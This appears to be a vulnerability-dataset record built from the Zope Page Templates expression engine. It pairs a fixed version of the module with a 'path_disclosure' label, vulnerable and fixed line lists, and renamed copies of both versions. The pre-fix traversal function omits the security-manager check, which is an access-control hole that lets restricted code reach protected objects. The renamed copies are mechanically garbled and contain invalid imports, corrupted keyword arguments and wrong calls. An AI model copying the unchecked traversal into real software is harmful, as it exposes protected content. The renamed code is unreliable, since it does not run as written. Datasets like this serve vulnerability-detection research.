        o This method is a fossil: nobody actually calls it, but the
        interface requires it.
        """
        raise NotImplementedError
class ErrorInfo(BaseErrorInfo):
    """Information about an exception passed to an on-error handler.
    """
    # Exposed to restricted code so TAL on-error handlers can inspect it.
    __allow_access_to_unprotected_subobjects__ = True
# Whether an engine is Zope aware does not depend on the class
# but how it is configured - especially, that is uses a Zope aware
# `PathExpr` implementation.
# Nevertheless, we mark the class as "Zope aware" for simplicity
# assuming that users of the class use a proper `PathExpr`
@implementer(IZopeAwareEngine)
class ZopeEngine(Z3Engine):
    """zope.pagetemplate engine that creates ZopeContext contexts."""
    _create_context = ZopeContext
class ZopeIterator(Iterator):
    """TALES ``repeat`` iterator with Zope 2 compatibility additions."""
    # allow iterator API to be accessed from (restricted) Python TALES
    # expressions
    __allow_access_to_unprotected_subobjects__ = True
    # The things below used to be attributes in
    # ZTUtils.Iterator.Iterator, however in zope.tales.tales.Iterator
    # they're methods.  We need BBB on the Python level so we redefine
    # them as properties here.  Eventually, we would like to get rid
    # of them, though, so that we won't have to maintain yet another
    # iterator class somewhere.
    @property
    def index(self):
        return super().index()
    @property
    def start(self):
        return super().start()
    @property
    def end(self):
        return super().end()
    @property
    def item(self):
        return super().item()
    # 'first' and 'last' are Zope 2 enhancements to the TALES iterator
    # spec.
    def first(self, name=None):
        # True on the first item, or whenever the (optionally named)
        # part differs from the previous item's.
        if self.start:
            return True
        return not self.same_part(name, self._last_item, self.item)
    def last(self, name=None):
        # True on the last item, or whenever the part differs from the
        # next item's.
        if self.end:
            return True
        return not self.same_part(name, self.item, self._next)
    def same_part(self, name, ob1, ob2):
        # Compare whole objects, or only the named attribute when given;
        # missing attributes (the ``no`` sentinel) never compare equal.
        if name is None:
            return ob1 == ob2
        no = object()
        return getattr(ob1, name, no) == getattr(ob2, name, no) is not no
    # 'first' needs to have access to the last item in the loop
    def __next__(self):
        if self._nextIndex > 0:
            self._last_item = self.item
        return super().__next__()
    def next(self):
        if self._nextIndex > 0:
            self._last_item = self.item
        return super().next()
@implementer(ITraversable)
class PathIterator(ZopeIterator):
    """A TALES Iterator with the ability to use first() and last() on
    subpaths of elements."""
    def traverse(self, name, furtherPath):
        # 'repeat/x/first/a/b' style access: hand the remaining path to
        # first()/last() as the part selector.
        if name in ('first', 'last'):
            method = getattr(self, name)
            # it's important that 'name' becomes a copy because we'll
            # clear out 'furtherPath'
            name = furtherPath[:]
            if not name:
                name = None
            # make sure that traversal ends here with us
            furtherPath[:] = []
            return method(name)
        return getattr(self, name)
    def same_part(self, name, ob1, ob2):
        # ``name`` may be a sub-path ('a/b'); compare the traversed
        # subpath values of both objects.
        if name is None:
            return ob1 == ob2
        if isinstance(name, str):
            name = name.split('/')
        elif isinstance(name, bytes):
            name = name.split(b'/')
        try:
            ob1 = boboAwareZopeTraverse(ob1, name, None)
            ob2 = boboAwareZopeTraverse(ob2, name, None)
        except ZopeUndefs:
            # Failed traversal means the parts cannot be considered equal.
            return False
        return ob1 == ob2
class UnicodeAwareStringExpr(StringExpr):
    """``string:`` expression that routes interpolated values through
    the Unicode Conflict Resolver when the template text is str."""

    def __call__(self, econtext):
        # Text templates coerce every interpolated value via
        # evaluateText so bytes are consistently resolved to unicode.
        if isinstance(self._expr, str):
            evaluate = econtext.evaluateText
        else:
            evaluate = econtext.evaluate
        values = tuple(evaluate(var) for var in self._vars)
        return self._expr % values
def createZopeEngine(zpe=ZopePathExpr, untrusted=True):
    """Create and configure a TALES engine with Zope 2 expression types.

    ``zpe`` is the path-expression class to register for the default
    path type names; ``untrusted`` marks whether the engine serves
    restricted (through-the-web) code.
    """
    e = ZopeEngine()
    e.iteratorFactory = PathIterator
    for pt in zpe._default_type_names:
        e.registerType(pt, zpe)
    e.registerType('string', UnicodeAwareStringExpr)
    e.registerType('python', ZRPythonExpr.PythonExpr)
    e.registerType('not', NotExpr)
    e.registerType('defer', DeferExpr)
    e.registerType('lazy', LazyExpr)
    e.registerType('provider', TALESProviderExpression)
    e.registerBaseName('modules', SecureModuleImporter)
    e.untrusted = untrusted
    return e
def createTrustedZopeEngine():
    """Create a TALES engine for trusted (filesystem) templates."""
    # same as createZopeEngine, but use non-restricted Python
    # expression evaluator
    # still uses the ``SecureModuleImporter``
    e = createZopeEngine(TrustedZopePathExpr, untrusted=False)
    e.types['python'] = PythonExpr
    return e
# Module-level singletons: one restricted engine for through-the-web
# templates and one trusted engine for filesystem templates.
_engine = createZopeEngine()
def getEngine():
    """Return the shared engine for untrusted templates."""
    return _engine
_trusted_engine = createTrustedZopeEngine()
def getTrustedEngine():
    """Return the shared engine for trusted (filesystem) templates."""
    return _trusted_engine
| ##############################################################################
#
# Copyright (c) 2002 Zope Foundation and Contributors.
#
# This software is subject to the provisions of the Zope Public License,
# Version 2.1 (ZPL). A copy of the ZPL should accompany this distribution.
# THIS SOFTWARE IS PROVIDED "AS IS" AND ANY AND ALL EXPRESS OR IMPLIED
# WARRANTIES ARE DISCLAIMED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF TITLE, MERCHANTABILITY, AGAINST INFRINGEMENT, AND FITNESS
# FOR A PARTICULAR PURPOSE
#
##############################################################################
"""Page Template Expression Engine
Page Template-specific implementation of TALES, with handlers
for Python expressions, string literals, and paths.
"""
import logging
import warnings
import OFS.interfaces
from AccessControl import safe_builtins
from AccessControl.SecurityManagement import getSecurityManager
from Acquisition import aq_base
from MultiMapping import MultiMapping
from zExceptions import NotFound
from zExceptions import Unauthorized
from zope.component import queryUtility
from zope.contentprovider.tales import TALESProviderExpression
from zope.i18n import translate
from zope.interface import implementer
from zope.pagetemplate.engine import ZopeEngine as Z3Engine
from zope.proxy import removeAllProxies
from zope.tales.expressions import DeferExpr
from zope.tales.expressions import LazyExpr
from zope.tales.expressions import NotExpr
from zope.tales.expressions import PathExpr
from zope.tales.expressions import StringExpr
from zope.tales.expressions import SubPathExpr
from zope.tales.expressions import Undefs
from zope.tales.pythonexpr import PythonExpr
from zope.tales.tales import Context
from zope.tales.tales import ErrorInfo as BaseErrorInfo
from zope.tales.tales import Iterator
from zope.traversing.adapters import traversePathElement
from zope.traversing.interfaces import ITraversable
from . import ZRPythonExpr
from .interfaces import IUnicodeEncodingConflictResolver
from .interfaces import IZopeAwareEngine
# Module importer exposed to TALES under the ``modules`` base name; it
# only permits imports allowed by Zope's security machinery.
SecureModuleImporter = ZRPythonExpr._SecureModuleImporter()
LOG = logging.getLogger('Expressions')
# In Zope 2 traversal semantics, NotFound or Unauthorized (the Zope 2
# versions) indicate that traversal has failed. By default, zope.tales'
# engine doesn't recognize them as such which is why we extend its
# list here and make sure our implementation of the TALES
# Path Expression uses them
ZopeUndefs = Undefs + (NotFound, Unauthorized)
def boboAwareZopeTraverse(object, path_items, econtext):
    """Traverses a sequence of names, first trying attributes then items.

    This uses zope.traversing path traversal where possible and interacts
    correctly with objects providing OFS.interface.ITraversable when
    necessary (bobo-awareness).

    Names starting with ``_`` (except the deprecated ``_``) raise
    NotFound, and every non-restrictedTraverse step is validated
    against the current security manager.
    """
    request = getattr(econtext, 'request', None)
    # Bind the security policy check once, outside the loop.
    validate = getSecurityManager().validate
    path_items = list(path_items)
    path_items.reverse()
    while path_items:
        name = path_items.pop()
        if OFS.interfaces.ITraversable.providedBy(object):
            # restrictedTraverse applies Zope security itself.
            object = object.restrictedTraverse(name)
        else:
            found = traversePathElement(object, name, path_items,
                                        request=request)
            # Special backwards compatibility exception for the name ``_``,
            # which was often used for translation message factories.
            # Allow and continue traversal.
            if name == '_':
                warnings.warn('Traversing to the name `_` is deprecated '
                              'and will be removed in Zope 6.',
                              DeprecationWarning)
                object = found
                continue
            # All other names starting with ``_`` are disallowed.
            # This emulates what restrictedTraverse does.
            if name.startswith('_'):
                raise NotFound(name)
            # traversePathElement doesn't apply any Zope security policy,
            # so we validate access explicitly here.
            try:
                validate(object, object, name, found)
                object = found
            except Unauthorized:
                # Convert Unauthorized to prevent information disclosures
                raise NotFound(name)
    return object
def trustedBoboAwareZopeTraverse(object, path_items, econtext):
    """Traverses a sequence of names, first trying attributes then items.

    This uses zope.traversing path traversal where possible and interacts
    correctly with objects providing OFS.interface.ITraversable when
    necessary (bobo-awareness).  Trusted variant: no security checks.
    """
    request = getattr(econtext, 'request', None)
    # Work on a reversed copy so each step is a cheap pop() off the end.
    remaining = list(path_items)
    remaining.reverse()
    while remaining:
        name = remaining.pop()
        if OFS.interfaces.ITraversable.providedBy(object):
            object = object.unrestrictedTraverse(name)
        else:
            object = traversePathElement(object, name, remaining,
                                         request=request)
    return object
def render(ob, ns):
    """Calls the object, possibly a document template, or just returns
    it if not callable.  (From DT_Util.py)
    """
    if hasattr(ob, '__render_with_namespace__'):
        return ZRPythonExpr.call_with_ns(ob.__render_with_namespace__, ns)

    # Strip acquisition wrappers and any proxies (e.g. deprecation
    # proxies around modules) before testing callability.
    unwrapped = removeAllProxies(aq_base(ob))
    if not callable(unwrapped):
        return ob
    try:
        if getattr(unwrapped, 'isDocTemp', 0):
            return ZRPythonExpr.call_with_ns(ob, ns, 2)
        return ob()
    except NotImplementedError:
        # Not renderable after all; hand back the object untouched.
        return ob
class _CombinedMapping:
    """Combine several mappings into one read-only lookup.

    Lookup walks the mappings in the order given; the first mapping
    containing the key wins.
    """

    def __init__(self, *ms):
        self.mappings = ms

    def get(self, key, default):
        # ``self`` doubles as a sentinel that can never collide with a
        # stored value, so stored ``None`` values are returned correctly.
        for mapping in self.mappings:
            hit = mapping.get(key, self)
            if hit is not self:
                return hit
        return default
class UntrustedSubPathExpr(SubPathExpr):
    # Sub-path expressions evaluated for untrusted (restricted) code
    # only get the restricted ``safe_builtins``.
    ALLOWED_BUILTINS = safe_builtins
class TrustedSubPathExpr(SubPathExpr):
    # We allow both Python's builtins (we are trusted)
    # as well as ``safe_builtins`` (because it may contain extensions).
    # Python's builtins take precedence, because those of
    # ``safe_builtins`` may have special restrictions meant only for
    # use in an untrusted context.
    ALLOWED_BUILTINS = _CombinedMapping(
        __builtins__,
        safe_builtins)
class ZopePathExpr(PathExpr):
    """TALES path expression type for untrusted (restricted) Zope code."""

    _TRAVERSER = staticmethod(boboAwareZopeTraverse)
    SUBEXPR_FACTORY = UntrustedSubPathExpr

    def __init__(self, name, expr, engine):
        # An empty path expression is evaluated as 'nothing'.
        if not expr.strip():
            expr = 'nothing'
        super().__init__(name, expr, engine, self._TRAVERSER)

    # override this to support different call metrics (see bottom of
    # method) and Zope 2's traversal exceptions (ZopeUndefs instead of
    # Undefs)
    def _eval(self, econtext):
        for expr in self._subexprs[:-1]:
            # Try all but the last subexpression, skipping undefined ones.
            try:
                ob = expr(econtext)
            except ZopeUndefs:  # use Zope 2 expression types
                pass
            else:
                break
        else:
            # On the last subexpression allow exceptions through.
            ob = self._subexprs[-1](econtext)
        if self._hybrid:
            return ob
        if self._name == 'nocall':
            return ob
        # this is where we are different from our super class:
        # the result is rendered (called) rather than returned raw.
        return render(ob, econtext.vars)

    # override this to support Zope 2's traversal exceptions
    # (ZopeUndefs instead of Undefs)
    def _exists(self, econtext):
        # Returns 1 as soon as any alternative evaluates without a
        # Zope traversal exception, else 0.
        for expr in self._subexprs:
            try:
                expr(econtext)
            except ZopeUndefs:  # use Zope 2 expression types
                pass
            else:
                return 1
        return 0
class TrustedZopePathExpr(ZopePathExpr):
    # Trusted variant: traversal without security validation and with
    # the unrestricted sub-path builtins.
    _TRAVERSER = staticmethod(trustedBoboAwareZopeTraverse)
    SUBEXPR_FACTORY = TrustedSubPathExpr
class SafeMapping(MultiMapping):
    """Mapping with security declarations and limited method exposure.

    Since it subclasses MultiMapping, this class can be used to wrap
    one or more mapping objects.  Restricted Python code will not be
    able to mutate the SafeMapping or the wrapped mappings, but will be
    able to read any value.
    """
    __allow_access_to_unprotected_subobjects__ = True
    # Hide the mutating API from restricted code; keep private aliases
    # so trusted callers can still push/pop.
    push = pop = None
    _push = MultiMapping.push
    _pop = MultiMapping.pop
class ZopeContext(Context):
    """TALES evaluation context with Zope 2 compatibility behaviour:
    a security-wrapped ``repeat`` variable, Zope-style boolean/default
    handling and unicode conflict resolution for text results."""

    def __init__(self, engine, contexts):
        super().__init__(engine, contexts)
        # wrap the top-level 'repeat' variable, as it is visible to
        # restricted code
        self.setContext('repeat', SafeMapping(self.repeat_vars))
        # regenerate the first scope and the scope stack after messing
        # with the global context
        self.vars = vars = contexts.copy()
        self._vars_stack = [vars]

    def translate(self, msgid, domain=None, mapping=None, default=None):
        # Delegate to zope.i18n, using the request as the translation
        # context.
        context = self.contexts.get('request')
        return translate(
            msgid, domain=domain, mapping=mapping,
            context=context, default=default)

    def evaluateBoolean(self, expr):
        value = self.evaluate(expr)
        # here we override the normal zope.tales behaviour. zope.tales
        # doesn't care about the default in a boolean expression,
        # while we do (Zope 2 legacy, see the
        # BooleanAttributesAndDefault.html test case)
        if value is self.getDefault():
            return value
        return bool(value)

    def evaluateStructure(self, expr):
        """ customized version in order to get rid of unicode
        errors for all and ever
        """
        text = super().evaluateStructure(expr)
        return self._handleText(text, expr)

    def evaluateText(self, expr):
        """ customized version in order to get rid of unicode
        errors for all and ever
        """
        text = self.evaluate(expr)
        return self._handleText(text, expr)

    def _handleText(self, text, expr):
        # Normalize an evaluation result to unicode text; the default
        # marker and None pass through unchanged.
        if text is self.getDefault() or text is None:
            # XXX: should be unicode???
            return text
        if isinstance(text, str):
            # we love unicode, nothing to do
            return text
        elif isinstance(text, bytes):
            # bahh...non-unicode string..we need to convert it to unicode
            # catch ComponentLookupError in order to make tests shut-up.
            # This should not be a problem since it won't change the old
            # default behavior
            resolver = queryUtility(IUnicodeEncodingConflictResolver)
            if resolver is None:
                # No resolver registered: fall back to strict ASCII.
                return text.decode('ascii')
            try:
                return resolver.resolve(
                    self.contexts.get('context'), text, expr)
            except UnicodeDecodeError as e:
                LOG.error("UnicodeDecodeError detected for expression \"%s\"\n"
                          "Resolver class: %s\n"
                          "Exception text: %s\n"
                          "Template: %s\n"
                          "Rendered text: %r" %
                          (expr, resolver.__class__, e,
                           self.contexts['template'].absolute_url(1), text))
                raise
        else:
            # This is a weird culprit ...calling text_type() on
            # non-string objects
            return str(text)

    def createErrorInfo(self, err, position):
        # Override, returning an object accessible to untrusted code.
        # See: https://bugs.launchpad.net/zope2/+bug/174705
        return ErrorInfo(err, position)

    def evaluateCode(self, lang, code):
        """ See ITALExpressionEngine.

        o This method is a fossil: nobody actually calls it, but the
          interface requires it.
        """
        raise NotImplementedError
class ErrorInfo(BaseErrorInfo):
    """Information about an exception passed to an on-error handler.
    """
    # Make the error details readable from restricted (untrusted) code.
    __allow_access_to_unprotected_subobjects__ = True
# Whether an engine is Zope aware does not depend on the class
# but how it is configured - especially, that it uses a Zope aware
# `PathExpr` implementation.
# Nevertheless, we mark the class as "Zope aware" for simplicity
# assuming that users of the class use a proper `PathExpr`.
@implementer(IZopeAwareEngine)
class ZopeEngine(Z3Engine):
    # Use our ZopeContext instead of the zope.tales default context.
    _create_context = ZopeContext
class ZopeIterator(Iterator):
    """TALES ``repeat`` iterator carrying the Zope 2 API additions."""

    # allow iterator API to be accessed from (restricted) Python TALES
    # expressions
    __allow_access_to_unprotected_subobjects__ = True

    # The things below used to be attributes in
    # ZTUtils.Iterator.Iterator, however in zope.tales.tales.Iterator
    # they're methods. We need BBB on the Python level so we redefine
    # them as properties here. Eventually, we would like to get rid
    # of them, though, so that we won't have to maintain yet another
    # iterator class somewhere.
    @property
    def index(self):
        return super().index()

    @property
    def start(self):
        return super().start()

    @property
    def end(self):
        return super().end()

    @property
    def item(self):
        return super().item()

    # 'first' and 'last' are Zope 2 enhancements to the TALES iterator
    # spec.
    def first(self, name=None):
        # True at the start of the loop or when the (named part of the)
        # item differs from the previous iteration's.
        if self.start:
            return True
        return not self.same_part(name, self._last_item, self.item)

    def last(self, name=None):
        # True at the end of the loop or when the (named part of the)
        # item differs from the next iteration's.
        if self.end:
            return True
        return not self.same_part(name, self.item, self._next)

    def same_part(self, name, ob1, ob2):
        # Compare two items, or — when *name* is given — the attribute
        # *name* of both (the chained comparison is False when the
        # attribute is missing on ob2).
        if name is None:
            return ob1 == ob2
        no = object()
        return getattr(ob1, name, no) == getattr(ob2, name, no) is not no

    # 'first' needs to have access to the last item in the loop
    def __next__(self):
        if self._nextIndex > 0:
            self._last_item = self.item
        return super().__next__()

    def next(self):
        # Legacy (Python 2) spelling kept for backward compatibility.
        if self._nextIndex > 0:
            self._last_item = self.item
        return super().next()
@implementer(ITraversable)
class PathIterator(ZopeIterator):
    """A TALES Iterator with the ability to use first() and last() on
    subpaths of elements."""

    def traverse(self, name, furtherPath):
        # Traversing to 'first' or 'last' consumes the remaining path
        # as the sub-path argument of that method.
        if name in ('first', 'last'):
            method = getattr(self, name)
            # it's important that 'name' becomes a copy because we'll
            # clear out 'furtherPath'
            name = furtherPath[:]
            if not name:
                name = None
            # make sure that traversal ends here with us
            furtherPath[:] = []
            return method(name)
        return getattr(self, name)

    def same_part(self, name, ob1, ob2):
        # *name* may be a path ('a/b/c'); traverse both objects along
        # it before comparing.  Traversal failures compare as unequal.
        if name is None:
            return ob1 == ob2
        if isinstance(name, str):
            name = name.split('/')
        elif isinstance(name, bytes):
            name = name.split(b'/')
        try:
            ob1 = boboAwareZopeTraverse(ob1, name, None)
            ob2 = boboAwareZopeTraverse(ob2, name, None)
        except ZopeUndefs:
            return False
        return ob1 == ob2
class UnicodeAwareStringExpr(StringExpr):
    """String expression that routes substituted values through
    ``evaluateText`` (and thus the Unicode Conflict Resolver) when the
    template expression is a unicode string."""

    def __call__(self, econtext):
        if isinstance(self._expr, str):
            # coerce values through the Unicode Conflict Resolver
            evaluate = econtext.evaluateText
        else:
            evaluate = econtext.evaluate
        substitutions = tuple(evaluate(var) for var in self._vars)
        return self._expr % substitutions
def createZopeEngine(zpe=ZopePathExpr, untrusted=True):
    """Build a TALES engine wired with Zope's expression types.

    ``zpe`` is the path-expression class to register; ``untrusted``
    marks the engine as intended for restricted code.
    """
    engine = ZopeEngine()
    engine.iteratorFactory = PathIterator
    # Register the path expression under each of its default type names.
    for type_name in zpe._default_type_names:
        engine.registerType(type_name, zpe)
    for type_name, handler in (
            ('string', UnicodeAwareStringExpr),
            ('python', ZRPythonExpr.PythonExpr),
            ('not', NotExpr),
            ('defer', DeferExpr),
            ('lazy', LazyExpr),
            ('provider', TALESProviderExpression),
    ):
        engine.registerType(type_name, handler)
    engine.registerBaseName('modules', SecureModuleImporter)
    engine.untrusted = untrusted
    return engine
def createTrustedZopeEngine():
    """Like ``createZopeEngine`` but for trusted code: swaps in the
    non-restricted Python expression evaluator while still using the
    ``SecureModuleImporter``."""
    engine = createZopeEngine(TrustedZopePathExpr, untrusted=False)
    engine.types['python'] = PythonExpr
    return engine
# Module-level singleton engines, built once at import time.
_engine = createZopeEngine()


def getEngine():
    # Shared engine for untrusted (restricted) code.
    return _engine


_trusted_engine = createTrustedZopeEngine()


def getTrustedEngine():
    # Shared engine for trusted (unrestricted) code.
    return _trusted_engine
| path_disclosure | {
"code": [
" if name == '_':",
" warnings.warn('Traversing to the name `_` is deprecated '",
" 'and will be removed in Zope 6.',",
" DeprecationWarning)",
" elif name.startswith('_'):",
" raise NotFound(name)",
" object = traversePathElement(object, name, path_items,",
" request=request)"
],
"line_no": [
79,
80,
81,
82,
83,
84,
89,
90
]
} | {
"code": [
"from AccessControl.SecurityManagement import getSecurityManager",
" validate = getSecurityManager().validate",
" found = traversePathElement(object, name, path_items,",
" if name == '_':",
" warnings.warn('Traversing to the name `_` is deprecated '",
" DeprecationWarning)",
" object = found",
" if name.startswith('_'):",
" try:",
" validate(object, object, name, found)",
" object = found",
" except Unauthorized:",
" raise NotFound(name)"
],
"line_no": [
24,
74,
84,
90,
91,
93,
94,
99,
104,
105,
106,
107,
109
]
} |
import logging
import warnings
import OFS.interfaces
from AccessControl import safe_builtins
from Acquisition import aq_base
from MultiMapping import MultiMapping
from zExceptions import NotFound
from zExceptions import Unauthorized
from zope.component import queryUtility
from zope.contentprovider.tales import TALESProviderExpression
from zope.i18n import .translate
from zope.interface import implementer
from zope.pagetemplate.engine import .ZopeEngine as Z3Engine
from zope.proxy import removeAllProxies
from zope.tales.expressions import DeferExpr
from zope.tales.expressions import LazyExpr
from zope.tales.expressions import NotExpr
from zope.tales.expressions import PathExpr
from zope.tales.expressions import StringExpr
from zope.tales.expressions import SubPathExpr
from zope.tales.expressions import Undefs
from zope.tales.pythonexpr import PythonExpr
from zope.tales.tales import Context
from zope.tales.tales import .ErrorInfo as BaseErrorInfo
from zope.tales.tales import Iterator
from zope.traversing.adapters import .traversePathElement
from zope.traversing.interfaces import ITraversable
from . import ZRPythonExpr
from .interfaces import IUnicodeEncodingConflictResolver
from .interfaces import IZopeAwareEngine
VAR_0 = ZRPythonExpr._SecureModuleImporter()
VAR_1 = logging.getLogger('Expressions')
VAR_2 = Undefs + (NotFound, Unauthorized)
def FUNC_0(VAR_3, VAR_4, VAR_5):
VAR_12 = getattr(VAR_5, 'request', None)
VAR_4 = list(VAR_4)
path_items.reverse()
while VAR_4:
VAR_19 = VAR_4.pop()
if VAR_19 == '_':
warnings.warn('Traversing to the VAR_19 `_` is deprecated '
'and will be removed in Zope 6.',
DeprecationWarning)
elif VAR_19.startswith('_'):
raise NotFound(VAR_19)
if OFS.interfaces.ITraversable.providedBy(VAR_3):
VAR_3 = VAR_3.restrictedTraverse(VAR_19)
else:
VAR_3 = traversePathElement(VAR_3, VAR_19, VAR_4,
VAR_12=request)
return VAR_3
def FUNC_1(VAR_3, VAR_4, VAR_5):
VAR_12 = getattr(VAR_5, 'request', None)
VAR_4 = list(VAR_4)
path_items.reverse()
while VAR_4:
VAR_19 = VAR_4.pop()
if OFS.interfaces.ITraversable.providedBy(VAR_3):
VAR_3 = VAR_3.unrestrictedTraverse(VAR_19)
else:
VAR_3 = traversePathElement(VAR_3, VAR_19, VAR_4,
VAR_12=request)
return VAR_3
def FUNC_2(VAR_6, VAR_7):
if hasattr(VAR_6, '__render_with_namespace__'):
VAR_6 = ZRPythonExpr.call_with_ns(VAR_6.__render_with_namespace__, VAR_7)
else:
VAR_40 = aq_base(VAR_6)
VAR_40 = removeAllProxies(VAR_40)
if callable(VAR_40):
try:
if getattr(VAR_40, 'isDocTemp', 0):
VAR_6 = ZRPythonExpr.call_with_ns(VAR_6, VAR_7, 2)
else:
VAR_6 = ob()
except NotImplementedError:
pass
return VAR_6
class CLASS_0:
def __init__(self, *VAR_13):
self.mappings = VAR_13
def FUNC_7(self, VAR_14, VAR_15):
for m in self.mappings:
VAR_43 = m.get(VAR_14, self)
if VAR_43 is not self:
return VAR_43
return VAR_15
class CLASS_1(SubPathExpr):
VAR_16 = safe_builtins
class CLASS_2(SubPathExpr):
VAR_16 = CLASS_0(
__builtins__,
safe_builtins)
class CLASS_3(PathExpr):
VAR_17 = staticmethod(FUNC_0)
VAR_18 = CLASS_1
def __init__(self, VAR_19, VAR_20, VAR_21):
if not VAR_20.strip():
VAR_20 = 'nothing'
super().__init__(VAR_19, VAR_20, VAR_21, self._TRAVERSER)
def FUNC_8(self, VAR_5):
for VAR_20 in self._subexprs[:-1]:
try:
VAR_6 = VAR_20(VAR_5)
except VAR_2: # use Zope 2 expression types
pass
else:
break
else:
VAR_6 = self._subexprs[-1](VAR_5)
if self._hybrid:
return VAR_6
if self._name == 'nocall':
return VAR_6
return FUNC_2(VAR_6, VAR_5.vars)
def FUNC_9(self, VAR_5):
for VAR_20 in self._subexprs:
try:
VAR_20(VAR_5)
except VAR_2: # use Zope 2 expression types
pass
else:
return 1
return 0
class CLASS_4(CLASS_3):
VAR_17 = staticmethod(FUNC_1)
VAR_18 = CLASS_2
class CLASS_5(MultiMapping):
__allow_access_to_unprotected_subobjects__ = True
VAR_22 = VAR_23 = None
VAR_24 = MultiMapping.push
VAR_25 = MultiMapping.pop
class CLASS_6(Context):
def __init__(self, VAR_21, VAR_26):
super().__init__(VAR_21, VAR_26)
self.setContext('repeat', CLASS_5(self.repeat_vars))
self.vars = VAR_41 = VAR_26.copy()
self._vars_stack = [VAR_41]
def FUNC_10(self, VAR_27, VAR_28=None, VAR_29=None, VAR_15=None):
VAR_42 = self.contexts.get('request')
return FUNC_10(
VAR_27, VAR_28=domain, VAR_29=mapping,
VAR_42=context, VAR_15=default)
def FUNC_11(self, VAR_20):
VAR_43 = self.evaluate(VAR_20)
if VAR_43 is self.getDefault():
return VAR_43
return bool(VAR_43)
def FUNC_12(self, VAR_20):
VAR_30 = super().evaluateStructure(VAR_20)
return self._handleText(VAR_30, VAR_20)
def FUNC_13(self, VAR_20):
VAR_30 = self.evaluate(VAR_20)
return self._handleText(VAR_30, VAR_20)
def FUNC_14(self, VAR_30, VAR_20):
if VAR_30 is self.getDefault() or VAR_30 is None:
return VAR_30
if isinstance(VAR_30, str):
return VAR_30
elif isinstance(VAR_30, bytes):
VAR_49 = queryUtility(IUnicodeEncodingConflictResolver)
if VAR_49 is None:
return VAR_30.decode('ascii')
try:
return VAR_49.resolve(
self.contexts.get('context'), VAR_30, VAR_20)
except UnicodeDecodeError as VAR_39:
VAR_1.error("UnicodeDecodeError detected for expression \"%s\"\n"
"Resolver class: %s\n"
"Exception VAR_30: %s\n"
"Template: %s\n"
"Rendered VAR_30: %r" %
(VAR_20, VAR_49.__class__, VAR_39,
self.contexts['template'].absolute_url(1), VAR_30))
raise
else:
return str(VAR_30)
def FUNC_15(self, VAR_31, VAR_32):
return CLASS_7(VAR_31, VAR_32)
def FUNC_16(self, VAR_33, VAR_34):
raise NotImplementedError
class CLASS_7(BaseErrorInfo):
__allow_access_to_unprotected_subobjects__ = True
@implementer(IZopeAwareEngine)
class CLASS_8(Z3Engine):
VAR_35 = CLASS_6
class CLASS_9(Iterator):
__allow_access_to_unprotected_subobjects__ = True
@property
def FUNC_17(self):
return super().index()
@property
def FUNC_18(self):
return super().start()
@property
def FUNC_19(self):
return super().end()
@property
def FUNC_20(self):
return super().item()
def FUNC_21(self, VAR_19=None):
if self.start:
return True
return not self.same_part(VAR_19, self._last_item, self.item)
def FUNC_22(self, VAR_19=None):
if self.end:
return True
return not self.same_part(VAR_19, self.item, self._next)
def FUNC_23(self, VAR_19, VAR_36, VAR_37):
if VAR_19 is None:
return VAR_36 == VAR_37
VAR_44 = VAR_3()
return getattr(VAR_36, VAR_19, VAR_44) == getattr(VAR_37, VAR_19, VAR_44) is not VAR_44
def __next__(self):
if self._nextIndex > 0:
self._last_item = self.item
return super().__next__()
def FUNC_24(self):
if self._nextIndex > 0:
self._last_item = self.item
return super().next()
@implementer(ITraversable)
class CLASS_10(CLASS_9):
def FUNC_25(self, VAR_19, VAR_38):
if VAR_19 in ('first', 'last'):
VAR_46 = getattr(self, VAR_19)
VAR_19 = VAR_38[:]
if not VAR_19:
VAR_19 = None
VAR_38[:] = []
return VAR_46(VAR_19)
return getattr(self, VAR_19)
def FUNC_23(self, VAR_19, VAR_36, VAR_37):
if VAR_19 is None:
return VAR_36 == VAR_37
if isinstance(VAR_19, str):
VAR_19 = VAR_19.split('/')
elif isinstance(VAR_19, bytes):
VAR_19 = VAR_19.split(b'/')
try:
VAR_36 = FUNC_0(VAR_36, VAR_19, None)
VAR_37 = FUNC_0(VAR_37, VAR_19, None)
except VAR_2:
return False
return VAR_36 == VAR_37
class CLASS_11(StringExpr):
def __call__(self, VAR_5):
VAR_45 = []
if isinstance(self._expr, str):
VAR_47 = VAR_5.evaluateText
else:
VAR_47 = VAR_5.evaluate
for var in self._vars:
VAR_48 = VAR_47(var)
VAR_45.append(VAR_48)
return self._expr % tuple(VAR_45)
def FUNC_3(VAR_8=CLASS_3, VAR_9=True):
VAR_39 = CLASS_8()
VAR_39.iteratorFactory = CLASS_10
for pt in VAR_8._default_type_names:
VAR_39.registerType(pt, VAR_8)
VAR_39.registerType('string', CLASS_11)
VAR_39.registerType('python', ZRPythonExpr.PythonExpr)
VAR_39.registerType('not', NotExpr)
VAR_39.registerType('defer', DeferExpr)
VAR_39.registerType('lazy', LazyExpr)
VAR_39.registerType('provider', TALESProviderExpression)
VAR_39.registerBaseName('modules', VAR_0)
VAR_39.untrusted = VAR_9
return VAR_39
def FUNC_4():
VAR_39 = FUNC_3(CLASS_4, VAR_9=False)
VAR_39.types['python'] = PythonExpr
return VAR_39
VAR_10 = FUNC_3()
def FUNC_5():
return VAR_10
VAR_11 = FUNC_4()
def FUNC_6():
return VAR_11
|
import logging
import warnings
import OFS.interfaces
from AccessControl import safe_builtins
from AccessControl.SecurityManagement import .getSecurityManager
from Acquisition import aq_base
from MultiMapping import MultiMapping
from zExceptions import NotFound
from zExceptions import Unauthorized
from zope.component import queryUtility
from zope.contentprovider.tales import TALESProviderExpression
from zope.i18n import .translate
from zope.interface import implementer
from zope.pagetemplate.engine import .ZopeEngine as Z3Engine
from zope.proxy import removeAllProxies
from zope.tales.expressions import DeferExpr
from zope.tales.expressions import LazyExpr
from zope.tales.expressions import NotExpr
from zope.tales.expressions import PathExpr
from zope.tales.expressions import StringExpr
from zope.tales.expressions import SubPathExpr
from zope.tales.expressions import Undefs
from zope.tales.pythonexpr import PythonExpr
from zope.tales.tales import Context
from zope.tales.tales import .ErrorInfo as BaseErrorInfo
from zope.tales.tales import Iterator
from zope.traversing.adapters import .traversePathElement
from zope.traversing.interfaces import ITraversable
from . import ZRPythonExpr
from .interfaces import IUnicodeEncodingConflictResolver
from .interfaces import IZopeAwareEngine
VAR_0 = ZRPythonExpr._SecureModuleImporter()
VAR_1 = logging.getLogger('Expressions')
VAR_2 = Undefs + (NotFound, Unauthorized)
def FUNC_0(VAR_3, VAR_4, VAR_5):
VAR_12 = getattr(VAR_5, 'request', None)
